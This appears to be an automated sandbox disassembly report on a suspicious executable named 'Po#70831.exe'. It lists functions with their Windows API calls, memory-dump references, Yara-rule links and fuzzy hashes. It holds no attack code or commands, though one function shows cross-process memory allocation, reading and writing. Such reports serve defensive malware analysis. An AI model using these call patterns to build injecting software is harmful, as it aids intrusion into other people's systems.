                                      Function 004CD73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004CD752
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004CD764
                                      • _free.LIBCMT ref: 004CD776
                                      • _free.LIBCMT ref: 004CD788
                                      • _free.LIBCMT ref: 004CD79A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: a6a79d3be8355f3f0129db5da4c35c7492e40b98e672eae05306439c28c59f16
                                      • Instruction ID: 9104be282f2f97d64bd614c76e82b00cd50399ef8095e31264079654038bb237
                                      • Opcode Fuzzy Hash: a6a79d3be8355f3f0129db5da4c35c7492e40b98e672eae05306439c28c59f16
                                      • Instruction Fuzzy Hash: 74F068BAA413046F8691EB55F9C5E177BDDBB04311795081FF049D7602C778FC808668
                                      Function 004F5C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 004F5C58
                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 004F5C6F
                                      • MessageBeep.USER32(00000000), ref: 004F5C87
                                      • KillTimer.USER32(?,0000040A), ref: 004F5CA3
                                      • EndDialog.USER32(?,00000001), ref: 004F5CBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                      • String ID:
                                      • API String ID: 3741023627-0
                                      • Opcode ID: dece5c69db090dbfe2fa34c49a7fcba93c91ee8a31d5c8cad07b1d1acb3ef1f0
                                      • Instruction ID: c1a6ea62613d1c8b25c27a909f37c70ea377b45350dd4d60bcccc9065a6fa2a0
                                      • Opcode Fuzzy Hash: dece5c69db090dbfe2fa34c49a7fcba93c91ee8a31d5c8cad07b1d1acb3ef1f0
                                      • Instruction Fuzzy Hash: 1B01D630500B48ABFB305B14DD4EFBA7BB8FF11B05F00015AA383A11E1DBF4A9899A95
                                      Function 004C22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 004C22BE
                                        • Part of subcall function 004C29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000), ref: 004C29DE
                                        • Part of subcall function 004C29C8: GetLastError.KERNEL32(00000000,?,004CD7D1,00000000,00000000,00000000,00000000,?,004CD7F8,00000000,00000007,00000000,?,004CDBF5,00000000,00000000), ref: 004C29F0
                                      • _free.LIBCMT ref: 004C22D0
                                      • _free.LIBCMT ref: 004C22E3
                                      • _free.LIBCMT ref: 004C22F4
                                      • _free.LIBCMT ref: 004C2305
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: e843f8f6a5808220ecab006c45b3ba31ae52c7e5f74971beb3af48aa1b8ededb
                                      • Instruction ID: 82c3bd9f058cf0c8a294fd32a82eb158acff1bcaa30d9ed94f346586f78a53b4
                                      • Opcode Fuzzy Hash: e843f8f6a5808220ecab006c45b3ba31ae52c7e5f74971beb3af48aa1b8ededb
                                      • Instruction Fuzzy Hash: 83F017FC9406209F8652AF5AAD11E1A7EA4B739761704250FF410D33B1CBF80919FAAC
                                      Function 004A95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      • EndPath.GDI32(?), ref: 004A95D4
                                      • StrokeAndFillPath.GDI32(?,?,004E71F7,00000000,?,?,?), ref: 004A95F0
                                      • SelectObject.GDI32(?,00000000), ref: 004A9603
                                      • DeleteObject.GDI32 ref: 004A9616
                                      • StrokePath.GDI32(?), ref: 004A9631
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                      • String ID:
                                      • API String ID: 2625713937-0
                                      • Opcode ID: 4009aef5fea411d8b45f4f0e111ea8567bfeab4c9d05aff812e0a4a39efe4b21
                                      • Instruction ID: 89b98bce6a30b47f1fac048fe316215146ba58c2dc299e9c81d7ce9852331c48
                                      • Opcode Fuzzy Hash: 4009aef5fea411d8b45f4f0e111ea8567bfeab4c9d05aff812e0a4a39efe4b21
                                      • Instruction Fuzzy Hash: B9F08131405A04EBEB264F18EC1C7793F64AF32322F088214F415561F1C774499AFF68
                                      Function 004C0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: __freea$_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 3432400110-3206640213
                                      • Opcode ID: 2f5fab3d50bbd6f74f744724e3ec19d903e743733437b3221db1cd38de489bbf
                                      • Instruction ID: 9202d65d84c1c241307581ad896995201dcac0d44b599779e70e07c6e691ddaf
                                      • Opcode Fuzzy Hash: 2f5fab3d50bbd6f74f744724e3ec19d903e743733437b3221db1cd38de489bbf
                                      • Instruction Fuzzy Hash: 26D1E339900245CAEBA49F68C445FBBB7B0EB07304F18415FE901ABB72D63D9D81CB99
                                      Function 005161D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004B0242: EnterCriticalSection.KERNEL32(0056070C,00561884,?,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B024D
                                        • Part of subcall function 004B0242: LeaveCriticalSection.KERNEL32(0056070C,?,004A198B,00562518,?,?,?,004912F9,00000000), ref: 004B028A
                                        • Part of subcall function 004B00A3: __onexit.LIBCMT ref: 004B00A9
                                      • __Init_thread_footer.LIBCMT ref: 00516238
                                        • Part of subcall function 004B01F8: EnterCriticalSection.KERNEL32(0056070C,?,?,004A8747,00562514), ref: 004B0202
                                        • Part of subcall function 004B01F8: LeaveCriticalSection.KERNEL32(0056070C,?,004A8747,00562514), ref: 004B0235
                                        • Part of subcall function 0050359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 005035E4
                                        • Part of subcall function 0050359C: LoadStringW.USER32(00562390,?,00000FFF,?), ref: 0050360A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                      • String ID: x#V$x#V$x#V
                                      • API String ID: 1072379062-1468514119
                                      • Opcode ID: 167944a67ab2b0c09a0cdb4b0bd71a55c00ac68fe1600b18edbf10d88ec2bb70
                                      • Instruction ID: 91ccac22c7678e3f8077acec7338f72bcd0139dee32d2a03fdb899d8b36d391f
                                      • Opcode Fuzzy Hash: 167944a67ab2b0c09a0cdb4b0bd71a55c00ac68fe1600b18edbf10d88ec2bb70
                                      • Instruction Fuzzy Hash: CBC17971A00105ABDB14DF98C894EFEBBB9FF58304F10846EE9159B291DB74ED85CBA0
                                      Function 004C8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 004C8B6E
                                      • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 004C8B7A
                                      • __dosmaperr.LIBCMT ref: 004C8B81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                      • String ID: .K
                                      • API String ID: 2434981716-1219020502
                                      • Opcode ID: cf4c21376c8239da41c42c852e404e0b8247608080cd4646271492dca2d90628
                                      • Instruction ID: f38d327b748f7bd11e748eebdbdf8a1a1622f6295ad29ce1596649b05a1b3d02
                                      • Opcode Fuzzy Hash: cf4c21376c8239da41c42c852e404e0b8247608080cd4646271492dca2d90628
                                      • Instruction Fuzzy Hash: D0416DB8504145AFDB649F18CC81F7A7F95DB86304B1841AFF48587242EA359C03D758
                                      Function 004F2716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004FB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F21D0,?,?,00000034,00000800,?,00000034), ref: 004FB42D
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004F2760
                                        • Part of subcall function 004FB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 004FB3F8
                                        • Part of subcall function 004FB32A: GetWindowThreadProcessId.USER32(?,?), ref: 004FB355
                                        • Part of subcall function 004FB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004F2194,00000034,?,?,00001004,00000000,00000000), ref: 004FB365
                                        • Part of subcall function 004FB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004F2194,00000034,?,?,00001004,00000000,00000000), ref: 004FB37B
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004F27CD
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004F281A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 9c83fcc958184a048874a6579f70e8742034e00430d866f647e9f8fcad659850
                                      • Instruction ID: efc7e1c75a3d90129bfd35718fa7af13f5d105900b81107f816292734b121253
                                      • Opcode Fuzzy Hash: 9c83fcc958184a048874a6579f70e8742034e00430d866f647e9f8fcad659850
                                      • Instruction Fuzzy Hash: 4E413D7290021CAFDB10DFA4CD82AEEBBB8EF09304F00405AFA55B7191DB746E45CBA5
                                      Function 004C172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Po#70831.exe,00000104), ref: 004C1769
                                      • _free.LIBCMT ref: 004C1834
                                      • _free.LIBCMT ref: 004C183E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: C:\Users\user\Desktop\Po#70831.exe
                                      • API String ID: 2506810119-1919141083
                                      • Opcode ID: c3c0e9f41ec3270879d76a2792a46ef448d5968bc597975ad82335b085cd5721
                                      • Instruction ID: 88dab0dc41c1253e5141f3d431a059eeb5e41b4f5d086dbba20dac164dcbb49e
                                      • Opcode Fuzzy Hash: c3c0e9f41ec3270879d76a2792a46ef448d5968bc597975ad82335b085cd5721
                                      • Instruction Fuzzy Hash: 6D31B679A04208AFDB51DF9A8881E9FBBFCEB56310B14416FE404D7322D6B44A44D7A8
                                      Function 004FC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004FC306
                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 004FC34C
                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00561990,011852D8), ref: 004FC395
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 16b99ddcb3f1ecee1001f997a5d11058cf75e6dbf864416d7b514e1b311e0b09
                                      • Instruction ID: 26b7b66069da4021c1e1c0a458637f496e0b4b7eb88e66e0617c5b626de25095
                                      • Opcode Fuzzy Hash: 16b99ddcb3f1ecee1001f997a5d11058cf75e6dbf864416d7b514e1b311e0b09
                                      • Instruction Fuzzy Hash: D041BF312043099FD720DF29D984B6BBBE4AF85354F00861EFEA5972D1C738E904CB5A
                                      Function 00524416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0052CC08,00000000,?,?,?,?), ref: 005244AA
                                      • GetWindowLongW.USER32 ref: 005244C7
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005244D7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 7c43c610c255eeb65d98c6d9666efa54248d2f98a3ca747e46d92820c961d2fb
                                      • Instruction ID: b9342cc513ea04337e34f61bd85ce08054635ac0152dd5905ec9374b92a4d763
                                      • Opcode Fuzzy Hash: 7c43c610c255eeb65d98c6d9666efa54248d2f98a3ca747e46d92820c961d2fb
                                      • Instruction Fuzzy Hash: D2319C31200615ABDF209E38EC45BEA7FA9FF0A324F204725F975A21D1D774EC519B90
                                      Function 004F6E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SysReAllocString.OLEAUT32(?,?), ref: 004F6EED
                                      • VariantCopyInd.OLEAUT32(?,?), ref: 004F6F08
                                      • VariantClear.OLEAUT32(?), ref: 004F6F12
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: Variant$AllocClearCopyString
                                      • String ID: *jO
                                      • API String ID: 2173805711-3018507528
                                      • Opcode ID: 66a8bc32fdff059829c6fa662c310e8cf364d72ca434b58786d0b6a7300830b6
                                      • Instruction ID: c453eb937ca3662b17851f3f4e3d48cdaefb917930b0201a3ecfcdf413efc528
                                      • Opcode Fuzzy Hash: 66a8bc32fdff059829c6fa662c310e8cf364d72ca434b58786d0b6a7300830b6
                                      • Instruction Fuzzy Hash: 0131B372704249DFCF04AF65E8509BE3B75EF45308B1504AEFA064B2A1C7389D12DBE9
                                      Function 0051304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0051335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00513077,?,?), ref: 00513378
                                      • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0051307A
                                      • _wcslen.LIBCMT ref: 0051309B
                                      • htons.WSOCK32(00000000,?,?,00000000), ref: 00513106
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2370576579.0000000000491000.00000020.00000001.01000000.00000003.sdmp, Offset: 00490000, based on PE: true
                                      • Associated: 00000000.00000002.2370532636.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371458181.000000000055C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000056C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.0000000000578000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2371497891.000000000058C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_490000_Po#70831.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 946324512-2422070025
                                      • Opcode ID: c73f4e8f040273620f650d2b912bca550e0418accfcd418d12a19e336a59b8b5
                                      • Instruction ID: c94214c66a2b5b37391e3b49d9a3de2f6f7e8948f3f794ca402f8807075de389
                                      • Opcode Fuzzy Hash: c73f4e8f040273620f650d2b912bca550e0418accfcd418d12a19e336a59b8b5
                                      • Instruction Fuzzy Hash: 2331D5396002019FEB20CF29C495EE97FE0FF59318F248499E9158B3A2D771EE85C760
